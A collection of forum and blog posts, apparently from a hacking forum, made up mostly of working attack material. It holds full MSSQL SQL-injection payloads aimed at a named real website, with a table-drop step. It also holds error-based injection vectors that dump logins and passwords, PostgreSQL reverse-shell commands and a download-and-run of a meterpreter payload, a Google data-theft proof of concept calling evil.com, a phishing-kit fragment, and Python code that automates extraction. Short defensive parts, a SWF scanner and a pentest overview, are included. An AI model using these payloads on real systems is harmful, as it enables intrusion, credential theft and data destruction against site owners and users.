only one table will be fetched. To get the next table in the next iteration we used the NOT IN clause, but the NOT IN clause needs a collection, for which we declared a TABLE @TMPTbl with a COLUMN named name. The first time @TMPTbl will be empty, so the first table_name will be retrieved into @tblName, and here, in this part,

INSERT @TMPTbl VALUES(@tblName)

each time the @tblName value will be inserted into @TMPTbl. When it goes to this line again,

SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl)

the next table will be retrieved by this statement, and so on, as @TMPTbl now has the first table_name. When the loop ends, all tables and columns will have been added to @data.
And then with this statement

SELECT @data AS output INTO Challenge

we can store all of @data into a new table Challenge, to use it in the query:

http://site.com/page.aspx?id=1;BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data = 'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames SET @counter = @counter + 1 END SELECT @data AS output INTO Challenge END-- -

Now change + to %2b, because + is taken as a space when sent from the URL. For the Challenge site our final query will be like:

http://www.uwdmaindia.org/EventDetails.aspx?ID=3';BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data=' injected by rummykhan :: '%2b@@version%2b'<br/>'%2bdb_name() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames %2b' : '%2bcolumn_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data=@data%2b'<br/><br/>Table : '%2b@tblName%2b'<br/>Columns : '%2b@colNames%2b'<br/>' SET @counter = @counter %2b 1 END SELECT @data AS output INTO Challenge END-- -

And now the final part of the Challenge.
STEP 2: how to see the output on the web page.

http://site.com/page.aspx?id=-1 union select 1,2,3,output,5 from Challenge-- -

and in the Challenge case:

http://www.uwdmaindia.org/EventDetails.aspx?ID=0' union all select 1,2,3,4,5,output,7,8 from Challenge-- -

Running the first query multiple times will result in an error that an object named Challenge already exists, so don't forget to drop that table after running the query the first time:

http://www.uwdmaindia.org/EventDetails.aspx?ID=0'; DROP TABLE Challenge-- -

And in some cases where System.Web.HttpException is enabled, it takes HTML tags as dangerous requests, so I changed these to MSSQL CHAR(). Now this will work fine in almost every scenario. The variable names are also shortened; the reason is the same, the System.Web.HttpException of ASP.NET cannot parse a long query.

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @mytbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by rummykhan :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @mytbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @mytbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Chall1 END-- -

Authors of this DIOS: Zenodermus & rummykhan

Thanks a lot for reading this lengthy tutorial, but I think it deserves your time, because it is entirely a new thing in MSSQL; there was no DIOS existing of this much completeness.
Happy Injecting

Greetz: Ch3rn0by1 : Lafangoo : Connecting : exploiter-z : PMH~Str!k3r : Gujjar(PCP) : MakMan : madcodE : Ajkaro : Blackhawk : benzi : t.Pro : h4x0r : Sho0Ter

Source: https://rdot.org/forum/showthread.php?t=3251
-
New error-based SQL Injection vectors in MySQL >= 5.7.5

1. ST_LatFromGeoHash()

mysql> select ST_LatFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LATFROMGEOHASH

2. ST_LongFromGeoHash()

mysql> select ST_LongFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LONGFROMGEOHASH

3. ST_PointFromGeoHash()

mysql> select ST_PointFromGeoHash(version(),0);
ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function st_pointfromgeohash

Posted by dsrbr at 8:36 PM

Source: http://dsrbr.blogspot.ru/
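How the three vectors above are used in practice: the function rejects anything that is not a geohash and echoes the rejected value in its error text, so the result of an arbitrary subquery can be read out of the error message. The following is an added Python example, not part of dsrbr's post. The injected query shape, the `users` table, the sample secret and the stand-in server are constructed for illustration; the error message's echoed-length limit is not stated on the page, so the value is read in `SUBSTRING()` windows rather than in one go.

```python
"""Error-based extraction through MySQL 5.7's ST_*FromGeoHash() functions.

Added example, not part of the original post. The vulnerable query shape, the table and
column names, the sample secret and fake_server() are constructed so the code runs offline.
"""
import re

# MySQL's ERROR 1411 text; the function name is upper- or lower-case depending on the function.
ERROR_RE = re.compile(r"Incorrect geohash value: '(.*?)' for function ST_\w+", re.IGNORECASE)


def geohash_payload(expr: str, func: str = "ST_LatFromGeoHash") -> str:
    """Append to a numeric WHERE condition; the inner expression's value ends up in the error."""
    return f" AND {func}(({expr}))"


def window(expr: str, start: int, size: int) -> str:
    """SUBSTRING() window over the expression (MySQL positions are 1-based)."""
    return f"SUBSTRING(({expr}),{start},{size})"


def leaked_value(response: str):
    """The echoed value from an ERROR 1411 message, or None if the response is not that error."""
    m = ERROR_RE.search(response)
    return m.group(1) if m else None


def extract(expr: str, send, size: int = 32) -> str:
    """Read the whole value window by window; stop when a window comes back short or empty."""
    out, start = "", 1
    while True:
        piece = leaked_value(send(geohash_payload(window(expr, start, size))))
        if not piece:
            break
        out += piece
        if len(piece) < size:
            break
        start += size
    return out


# --- constructed stand-in for the vulnerable page, so the example runs offline ---
SECRET = "admin:5f4dcc3b5aa765d61d8327deb882cf99"  # constructed row, plays the subquery result
_WINDOW_RE = re.compile(r"SUBSTRING\(\(.*\),(\d+),(\d+)\)\)\)$")


def fake_server(payload: str) -> str:
    """Evaluates only the SUBSTRING window over SECRET and replies like a MySQL 5.7 error page."""
    m = _WINDOW_RE.search(payload)
    start, size = int(m.group(1)), int(m.group(2))
    piece = SECRET[start - 1:start - 1 + size]
    return f"ERROR 1411 (HY000): Incorrect geohash value: '{piece}' for function ST_LATFROMGEOHASH"


if __name__ == "__main__":
    query = "SELECT CONCAT(login,':',pass) FROM users LIMIT 1"  # assumed target subquery
    print(geohash_payload(window(query, 1, 32)))
    print(extract(query, fake_server, size=10))
```

Against a real target `send()` would issue the HTTP request carrying the payload and return the response body; everything else stays the same. Because the function only needs one scalar argument, the same `extract()` works with `ST_LongFromGeoHash` or `ST_PointFromGeoHash` by passing `func=`.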
-
Fast exploitation method of SQL Injection in IBM DB2

1. listagg

select * from news where id=-1 union select null,listagg(login||chr(58)||pass,chr(44)) from users

(In the first example I use the cast function only for good formatted output, but in the second and the third examples the cast function is needed for the type conversion.)

2. xmlgroup

select * from news where id=-1 union select null,cast(xml2clob(xmlgroup(login,pass)) as varchar(180)) from users

3. xmlagg

select * from news where id=-1 union select null,cast(xml2clob(xmlagg(xmlrow(login,pass))) as varchar(180)) from users

Posted by dsrbr at 10:02 AM

Source: http://dsrbr.blogspot.ru/
-
OS Command Execution in PostgreSQL >= 9.3

Linux

On the attacker's machine:

nc -lvp 55555

On the machine with PostgreSQL:

postgres=# create table evil (a text);
postgres=# copy evil from program 'mknod backpipe p; nc 192.168.234.138 55555 0<backpipe | /bin/bash 1>backpipe';

Getting the backconnect:

Windows

On the attacker's machine:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.234.138 LPORT=443 X > m.exe
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.234.138
set LPORT 443
exploit

On the machine with PostgreSQL:

postgres=# create table evil (a text);
postgres=# copy evil from program 'powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile(\"http://192.168.234.138/m.exe\", \"C:\windows\temp\m.exe\")}"';
postgres=# copy evil from program 'C:\windows\temp\m.exe';

Getting the backconnect:

Posted by dsrbr at 10:08 AM

Source: http://dsrbr.blogspot.ru/
-
Error-based SQL Injection vectors in Oracle using dbms_spm.* functions

Testing tables:

select * from news where id=1 and dbms_spm.alter_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users),1,1,1) is not null;
select * from news where id=1 and dbms_spm.create_evolve_task((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;
select * from news where id=1 and dbms_spm.drop_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;
select * from news where id=1 and dbms_spm.evolve_sql_plan_baseline((select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;
select * from news where id=1 and dbms_spm.implement_evolve_task((select login||chr(58)||pass from users where id=1)) is not null;
select * from news where id=1 and dbms_spm.load_plans_from_sqlset(1,(select login||chr(58)||pass from users where id=1),1) is not null;
select * from news where id=1 and dbms_spm.migrate_stored_outline((select login||chr(58)||pass from users where id=1)) is not null;
select * from news where id=1 and dbms_spm.report_auto_evolve_task(1,1,1,1,(select stragg(login||chr(58)||pass||chr(44)) from users)) is not null;
select * from news where id=1 and dbms_spm.report_evolve_task((select login||chr(58)||pass from users where id=1)) is not null;

Posted by dsrbr at 9:48 AM

Source: http://dsrbr.blogspot.ru/
-
SQL Inception: How to select yourself

By Aaron Devaney, 30 March 2015

In this blog post I will describe a few ways to view the whole SQL statement being executed as part of a SQL injection attack. Currently, unless the vulnerable page returns the SQL statement in an error message, performing an attack involves an amount of guesswork by the attacker. The more complicated the original SQL statement, the more difficult it can become to extract data using faster UNION based techniques. If the type of injection is blind then this can take time to perform and cause a lot of traffic to be generated, especially when extracting a significant amount of data from the database. This prompted the question: "Wouldn't this be a lot easier if I could see the SQL being executed?"

Databases Store Queries in Tables

So far I have discovered methods of extracting the original SQL query via a SQL injection attack on Oracle, Microsoft SQL Server, MySQL and Postgres databases. Other methods and techniques may exist with these and other databases; however, I find these four to be quite common and they have been my focus for this blog post. For Oracle and MS SQL databases, the query locations that I found require a relatively high privilege account to perform, but they also offer the ability to see other queries that have been executed before and by other users. Furthermore, these locations could contain sensitive information such as credentials / hashes and highlight the use of SQL functions and stored procedures, which would allow for a much greater understanding of how the application works.

MySQL and Postgres

The SQL queries that I used to extract the current running query for these two databases are as follows:

Postgres*:
Select current_query from pg_stat_activity

MySQL:
Select info from information_schema.processlist

* For Postgres, the column name is different depending on the version used. If 'current_query' doesn't work try just 'query'.
When extracting information from these tables it is important to consider what is happening. The database itself will be trying to use these tables at the same time as the web application that we are injecting, so occasionally it may report as empty. In my use of this so far, most of the time the query has worked fine in the real world.

To test these new techniques, I created a vulnerable web application with a needlessly complicated query and used the above as custom queries in a popular SQL injection tool called SQLMap. In the following example, the vulnerable application is a single web page with a MySQL backend.

http://localhost/test/vuln.aspx?album=1465

We can confirm that it is injectable by using payloads like:

1466-1
1465 order by 1
1465 order by 2

Furthermore, we know from using 'order by 3' that there are only two columns being returned; however, the following only returns our original row:

1465 union all select null,null

We can still use SQLMap to extract data from the database, as it will find that blind Boolean and time based techniques are working, but if we want to extract a lot of data quickly we will need to find out what else the query is doing. For this we can use SQLMap to execute one of the above queries using the --sql-query switch, which will return the full SQL statement that is being executed.

sqlmap -u "http://localhost/test/vuln.aspx?album=1465" --sql-query="select info from information_schema.processlist"

Fig. 1 - SQLMap output showing the original query on MySQL database

Removing the SQL that SQLMap injects, we can see the following statement which is being executed by the application, including a SQL comment that was left in for demonstration purposes.
Select title from ( select asin,title from album where rank = 1465) as test where asin like 'B0000%' -- Misc Comment

With the query visible, we can see that it is checking the first column in the outer select for a value like 'B0000%', so if we use the following as a payload, we should be able to extract data much faster.

1465 union all select 'B00000',TABLE_NAME from INFORMATION_SCHEMA.TABLES

Fig. 2 - List of table names from the database appended to the normal results

MS SQL and Oracle

Both MS SQL and Oracle store cached queries that can be accessed by high privilege accounts. For an attacker, this allows us to not only select the current query, but also to access other queries that have been executed as well. This could reveal credentials, function names, stored procedures as well as scheduled jobs that are being executed by the application. For the purpose of this blog, however, I will focus on the ability to retrieve the current query.

MS SQL 2005+:
SELECT st.text from sys.dm_exec_cached_plans cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st

Oracle:
select SQL_TEXT from v$sql

It's important to note that both of these resources will have more than one row, and in particular when using blind SQL injection each row could correspond to a variation on the injection. For example, if SQLMap were to send 500 requests to retrieve the current query then these cache tables will at least contain these 500 SQL queries. This poses a problem when performing blind SQL injection because the number of rows will increase with each request. A technique that we can use would be to include criteria in the custom sql-query search terms so that we only select one row which contains something that we are expecting, such as a particular ID. To test this I changed the database in my application to Oracle, and together with the vulnerable parameter we can craft a SQLMap command as follows.
sqlmap -u "http://localhost/test/vuln.aspx?album=513" --sql-query="SELECT SQL_TEXT from v$sql where SQL_TEXT like '%513%' and SQL_TEXT not like '%v$sql%' and ROWNUM = 1"

Here we attempt to select just the one row from the cache tables that contains our ID 513 but which doesn't contain references to the cache table such as v$sql. This is so that we don't select all of the queries that SQLMap will perform, which could be 100s or even 1,000s. The result is similar to the earlier examples, except we are now able to retrieve the original query without returning the injection SQL statements that SQLMap executes.

Fig. 3 - SQLMap output showing the extracted query

This produces the following result:

select title from ( select asin,title from album where rank=513) where asin like 'B0000%' -- Misc Comment

With both MS SQL and Oracle, we can go a step further and select other queries that have been executed, which can allow us to examine the other database calls that an application makes. This can include the use of stored procedures, functions and scheduled tasks, as well as the possibility to retrieve information such as credentials for an application if they are selected from a table. Knowing how to perform the UNION ALL on this vulnerable web page, and with the following payload, we can query the Oracle v$sql table to return all of the queries that have been executed recently. Since this application is quite simple there isn't much that stands out; however, on a real application this table would contain a lot of different queries, possibly dating back days, weeks or even months.

http://localhost/test/vuln.aspx?album=513+union+all+select+'B000000',SQL_TEXT+FROM+v$sql

As we can see from the results below, there is quite a lot of potentially useful information here and the queries seem to persist for quite some time.

Fig. 4 - Contents of the v$sql table on an Oracle DB.
Future Research

As well as enabling a greater understanding of SQL injection vulnerabilities, I hope that this technique may also enhance the current SQL injection tools available. Using these methods, it may be possible for a tool to extract the query first and use the results to modify the behaviour of the tool, making them more efficient. I intend to do more research to try and identify other methods of retrieving this information with lower privilege accounts and also to extend the list of databases to gain a more complete coverage of this technique.

Contact and Follow-Up

Aaron is part of our Assurance team in Context's London office. See the Contact page for how to get in touch.

Source: SQL Inception: How to select yourself
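The row selection the post does inside the `v$sql` query (keep rows with our ID, drop rows that read the cache itself), done client-side over the rows a tool returns, plus the step that follows it: reading the outer query's `LIKE` constraint and building the UNION payload that satisfies it. Added Python example, not part of Aaron Devaney's post; the cached rows are constructed, and picking the shortest candidate is an assumption that holds because boolean and time-based probes only ever add text to the application's own statement.

```python
"""Client-side cache-row selection and UNION payload construction.

Added example, not part of the original post. CACHED_ROWS is a constructed sample of what
the v$sql query returned; the column count (2) and the LIKE filter follow the post's own test
application. Choosing the shortest matching row is an assumption (see above).
"""
import re

# Names of the caches/activity views; rows reading them are our own probes, not the app's query.
CACHE_NAMES = ("v$sql", "dm_exec_cached_plans", "dm_exec_sql_text",
               "information_schema.processlist", "pg_stat_activity")


def pick_original_query(rows, marker):
    """Shortest cached statement that contains the marker (our ID) and does not read the cache."""
    candidates = [s for s in rows
                  if marker in s and not any(n in s.lower() for n in CACHE_NAMES)]
    return min(candidates, key=len) if candidates else None


def required_prefix(sql):
    """If the outer query filters with LIKE 'xxx%', the UNION row's first column must start with xxx."""
    m = re.search(r"like\s+'([^'%]*)%'", sql, re.IGNORECASE)
    return m.group(1) if m else None


def union_payload(marker, n_cols, prefix, expr, from_clause, expr_col=2):
    """UNION ALL that satisfies the LIKE filter in column 1 and carries expr in expr_col (1-based)."""
    cols = ["null"] * n_cols
    if prefix is not None:
        cols[0] = f"'{prefix}'"
    cols[expr_col - 1] = expr
    return f"{marker} union all select {','.join(cols)} from {from_clause}"


def recover(rows, marker, n_cols, expr, from_clause):
    """End to end: pick the application's query, read its constraint, build the UNION payload."""
    original = pick_original_query(rows, marker)
    if original is None:
        return None, None
    return original, union_payload(marker, n_cols, required_prefix(original), expr, from_clause)


# constructed sample of v$sql rows after a few injected requests
CACHED_ROWS = [
    "SELECT SQL_TEXT from v$sql where SQL_TEXT like '%513%'",
    "select title from ( select asin,title from album where rank=513 AND 7231=7231) where asin like 'B0000%'",
    "select title from ( select asin,title from album where rank=513) where asin like 'B0000%'",
    "select count(*) from sessions where user_id=99",
]

if __name__ == "__main__":
    original, payload = recover(CACHED_ROWS, "513", 2, "TABLE_NAME", "ALL_TABLES")
    print("application query:", original)
    print("payload:          ", payload)
```

With the MySQL and Postgres views from the post, the same `recover()` applies unchanged; only the rows fed in differ. If no `LIKE` constraint is found, column 1 is left as `null` and the attacker still has to satisfy whatever other filter the recovered query shows.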
-
Penetration Testing or Vulnerability Assessment – Which one should I choose?

March 31, 2015 Adrian Furtuna

In this post we will take a quick look at the differences between vulnerability assessment (VA) and penetration testing (PT). Furthermore, we'll give a set of questions that should help you decide which service is the best choice for your particular case.

So let's say you want to improve the security of your internal network infrastructure and you have to choose between VA and PT, offered by your favorite consultancy firm. First of all, let's see what they are.

Vulnerability Assessment – is the process of identifying and prioritizing technical vulnerabilities which affect a target system or network. It is mainly done automatically using a vulnerability scanner and it's usually aimed at a wide area of machines. The purpose of a VA is to find as many vulnerabilities as possible in the given time frame. Optionally, manual validation may be included for the critical findings, but this is not usually done when a high number of vulnerabilities are involved.

Penetration Testing – is a goal-based simulation of a real attack. The pentesters will search for a chain of vulnerabilities in the target system/network and exploit them to reach their target (e.g. gain access to a client database, obtain sensitive information, gain Domain Admin, etc). The pentest report will contain only the vulnerabilities encountered during the attack against the target and no additional checks are being made. However, the reported vulnerabilities are 100% validated and their risk for the business is accurate.

Neither VA nor PT should be confused with the security audit, which is a totally different service.

Full article: http://securitycafe.ro/2015/03/31/pentest-versus-vulnerability-scanning/
-
Exploiting CVE-2011-2461 on google.com

As a follow up of our Troopers 2015 presentation about CVE-2011-2461 we want to release more details about a real world exploitation scenario targeting Google services. During our large-scale analysis of web sites hosting vulnerable SWF files, we found out that Google was also affected.

Attack Flow

In the next lines we assume basic knowledge of the CVE-2011-2461 vulnerability; make sure to read our previous cross-posts on NibbleSec or Minded Security in case you missed something. In addition, please note that we are using evil.com as a "label" for a fictitious site controlled by an attacker.

The following steps outline a successful attack:

- The victim is logged on google.com, and visits a malicious website
- The malicious site loads an HTML page, which embeds the vulnerable SWF together with a malicious SWF resource file (specified via FlashVars)
- The vulnerable SWF file is loaded by the Flash player, consequently loading the malicious SWF file (after having verified the crossdomain.xml hosted on the attacker's site)
- Since the malicious SWF inherits the SecurityDomain of the vulnerable SWF, it can access HTTP responses from the victim's domain, leading to an "indirect" Same-Origin Policy bypass in fully patched web browsers and plug-ins.

Proof of Concept

Here follow the PoC files.
404 Not Found

<i>Victim's agenda:</i>
<textarea id="x" style="width: 100%; height:50%"></textarea>
<object width="100%" height="100%" type="application/x-shockwave-flash" data="https://www.google.com/wonderwheel/wonderwheel7.swf">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="resourceModuleURLs=http://evil.com/poc/URLr_google.swf">
</object>

http://evil.com/crossdomain.xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

http://evil.com/poc/URLr_google.swf (ActionScript code below)

package {
    import flash.display.Sprite;
    import flash.text.TextField;
    import flash.events.*;
    import flash.net.*;
    import flash.external.ExternalInterface;

    public class URLr_google extends Sprite {
        public static var app : URLr_google;
        private static var email : String;

        public function main():void {
            app = new URLr_google();
        }

        // 1st request: the Google front page, which contains the logged-in user's address
        public function URLr_google() {
            var url:String = "https://www.google.com/?gws_rd=cr";
            var loader:URLLoader = new URLLoader();
            configureListeners(loader);
            var request:URLRequest = new URLRequest(url);
            try {
                loader.load(request);
            } catch (error:Error) {
                ExternalInterface.call("alert", "Unable to load requested document");
            }
        }

        private function configureListeners(dispatcher:IEventDispatcher):void {
            dispatcher.addEventListener(Event.COMPLETE, completeHandler);
        }

        // 2nd request: initializes Google Calendar for the current session
        private function pingCalendar():void {
            var url:String = "https://www.google.com/calendar/";
            var loader:URLLoader = new URLLoader();
            configureListenersCalendar(loader);
            var request:URLRequest = new URLRequest(url);
            try {
                loader.load(request);
            } catch (error:Error) {
                ExternalInterface.call("alert", "Unable to load requested document");
            }
        }

        private function configureListenersCalendar(dispatcher:IEventDispatcher):void {
            dispatcher.addEventListener(Event.COMPLETE, completeHandlerCalendar);
        }

        // 3rd request: the embeddable agenda view for the stolen address
        private function getAgenda():void {
            var url:String = "https://www.google.com/calendar/htmlembed?skipwarning=true&eopt=3&mode=AGENDA&src=" + email;
            var loader:URLLoader = new URLLoader();
            configureListenersAgenda(loader);
            var request:URLRequest = new URLRequest(url);
            try {
                loader.load(request);
            } catch (error:Error) {
                ExternalInterface.call("alert", "Unable to load requested document");
            }
        }

        private function configureListenersAgenda(dispatcher:IEventDispatcher):void {
            dispatcher.addEventListener(Event.COMPLETE, completeHandlerAgenda);
        }

        private function completeHandler(event:Event):void {
            var loader:URLLoader = URLLoader(event.target);
            var s:String = loader.data;
            var pattern:RegExp = /[a-z0-9._-]+@[a-z0-9._-]+\.[a-z]+/i;
            var results:Array = s.match(pattern);
            if (results.length > 0) {
                email = results[0];
                ExternalInterface.call("eval", "alert('Email address: " + email + "')");
                pingCalendar();
            }
        }

        private function completeHandlerCalendar(event:Event):void {
            getAgenda();
        }

        private function completeHandlerAgenda(event:Event):void {
            var loader:URLLoader = URLLoader(event.target);
            var res:String = escape(loader.data);
            ExternalInterface.call("eval", "document.getElementById('x').value='" + res + "';document.getElementById('x').value=unescape(document.getElementById('x').value)");
            var pattern:RegExp = /title>[a-z0-9]+\s[a-z0-9]+<\/title/i;
            var results:Array = unescape(res).match(pattern);
            if (results.length > 0) {
                var name:String = results[0];
                name = (name.substring(name.indexOf(">") + 1)).split("<")[0];
                ExternalInterface.call("eval", "alert('Name and surname:" + name + "')");
            }
        }
    }
}

By asking the victim to access the page located at 404 Not Found, the attacker is able to steal the following information:

- Gmail address
- FirstName LastName
- Future events stored in Google Calendar

By inspecting the malicious resource "module", you will notice that it makes three different HTTP requests:

1st GET request to https://www.google.com/?gws_rd=cr to steal the victim's email address;
2nd GET request to https://www.google.com/calendar/ to initialize the Google Calendar for the current session;
3rd GET request to https://www.google.com/calendar/htmlembed?skipwarning=true&eopt=3&mode=AGENDA&src=[JUST_STOLEN_EMAIL_ADDRESS] to steal the victim's first name, last name and agenda.

Obviously, many other attack scenarios are possible, depending on the pages' functionalities. For instance, the malicious SWF could steal anti-CSRF tokens and perform actions on behalf of the user.

For the sake of transparency: we reported the issue to Google's security team early in December, and they quickly patched it and awarded us thanks to their bug bounty program. Cheers!

As a final reminder to developers, website owners and security teams: ParrotNG is your friend! Make sure to inspect all hosted SWF files, or at least sandbox them under different domains. In the latter case, ensure that sensitive domains are not giving trust to the sandboxing domains through relaxed crossdomain policy files, since the "trust chain" would cancel out the benefits of such a domain partition.

Brought to you by Mauro Gentile and Luca Carettoni

Posted by Mauro Gentile at 8:11 AM

Source: http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html
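A first-pass inventory of hosted SWF files, as the closing reminder above asks for, written as an added Python example. This is neither the authors' tooling nor ParrotNG: ParrotNG recognises the vulnerable Flex-generated loader code, while this script only parses the SWF container (plain `FWS`, zlib `CWS`) and looks for the literal name of the FlashVar the Flex loader reads, `resourceModuleURLs`, the same parameter the PoC HTML above passes. Treating that string as the indicator is an assumption; a hit means "Flex application that consumes resourceModuleURLs, run ParrotNG or recompile with a patched SDK", not proof of the bug. The SWF files used in the test are constructed in memory.

```python
"""Triage hosted SWF files for the CVE-2011-2461 loader.

Added example, not part of the original post and not ParrotNG. It walks a directory, parses
each SWF header (FWS plain, CWS zlib; ZWS/LZMA is reported, not decompressed) and reports
files whose body contains the indicator string. INDICATORS is an assumption (see above).
"""
import os
import struct
import zlib

INDICATORS = (b"resourceModuleURLs",)  # assumption: the FlashVar read by the Flex loader


def swf_body(data):
    """Uncompressed SWF body after the 8-byte header; validates signature and declared length."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    sig, length = data[:3], struct.unpack("<I", data[4:8])[0]  # length covers the header too
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        body = zlib.decompress(data[8:])
    elif sig == b"ZWS":
        raise ValueError("LZMA-compressed SWF (ZWS): decompress with lzma before scanning")
    else:
        raise ValueError("not a SWF file")
    if len(body) + 8 != length:
        raise ValueError("header length %d does not match body %d" % (length, len(body) + 8))
    return body


def find_indicators(data):
    """Indicator strings present in the SWF body, as a list of str."""
    body = swf_body(data)
    return [i.decode() for i in INDICATORS if i in body]


def scan_tree(root):
    """Map each *.swf under root to its indicator list (parse errors become an 'error: ...' entry)."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".swf"):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as fh:
                        results[path] = find_indicators(fh.read())
                except (ValueError, zlib.error) as exc:
                    results[path] = ["error: %s" % exc]
    return results


def make_swf(body, compress=True, version=10):
    """Wrap body in a minimal SWF container (used here to construct test files)."""
    sig = b"CWS" if compress else b"FWS"
    header = sig + bytes([version]) + struct.pack("<I", len(body) + 8)
    return header + (zlib.compress(body) if compress else body)


if __name__ == "__main__":
    import sys
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, "->", ", ".join(hits) or "no indicators")
```

Files reported as `ZWS` need an LZMA step first (the format stores the LZMA properties after the header), and the post's second piece of advice still applies to every file that comes back clean: keep SWFs on a sandbox domain that the sensitive origin's crossdomain.xml does not trust.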
-
Hi,

Maybe it's from some crappy updates, I have no idea, but today my internet (the connection to the router) wasn't working. I checked the connection through the router on my phone and it seemed OK. I saw that it works for a very short time, then stops working. It gets its network settings via DHCP, but it doesn't resolve DNS names and doesn't connect directly by IP. I didn't start Wireshark, since I didn't have time, to see what was happening, but after I UNINSTALLED Kaspersky, it worked.

PS: Just turning off the protection did NOT work.

I posted this in case others run into the same thing, so they know what it's about. A black mark for the Russians. Screw them.
-
PayPal Phishing Scam [2015] **FOR RST Members**
Nytro replied to White4142's topic in Cosul de gunoi
Nice work.

$to = "White4142@live.com"; // Email Here
$subject = "BANK INFOS = [$ip]";
$headers = "From: PP-Rezult <paypal@support.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n"; -
Scripting Metasploit for a Real-Life Pentest

March 25, 2015 Ionuț Ambrosie

During a recent internal penetration test, we got to the point where we had to search a lot of Windows machines for Domain Admin tokens. Of course, our objective was to impersonate such a (delegation) token with Metasploit and create our own Domain Admin user.

Since the search space was quite large, we had to automate this task by creating a custom Metasploit script. In this post we detail the creation of this script and its results.

A bit of context

During our penetration test we've managed to obtain the credentials of a privileged user. This user, let's call him Robert, had local administrative rights on multiple workstations in the Windows domain.

Furthermore, we've managed to create a low privileged domain user, which we'll further denote by OurUser, but we were not able to add it to the Domain Admins group.

However, we came up with the idea of using Robert's credentials to log in to as many hosts as possible and hope we can impersonate a more privileged user. By leveraging its privileges, we hoped we would be able to add OurUser to the Domain Admins group.

We've used the SMB Login Check Scanner in Metasploit for determining the range of hosts in the local domain which allowed us access with Robert's credentials. Armed with this list, we were faced with the Sisyphean task of connecting to each host and, using a combination of psexec_psh and reverse_tcp, open a meterpreter shell and then issue the appropriate commands.

Full article: Scripting Metasploit for a Real-Life Pentest – Security Café
-
Cybrary - Penetration Testing and Ethical Hacking 2015
Nytro replied to KhiZaRix's topic in Free stuff
Is there a torrent somewhere? -
Firefox Proxy Prototype Privileged Javascript Injection
Nytro replied to Aerosol's topic in Exploituri
Yes, simple and efficient: https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636 -
I'm not going to sit and read your nonsense. Thread closed.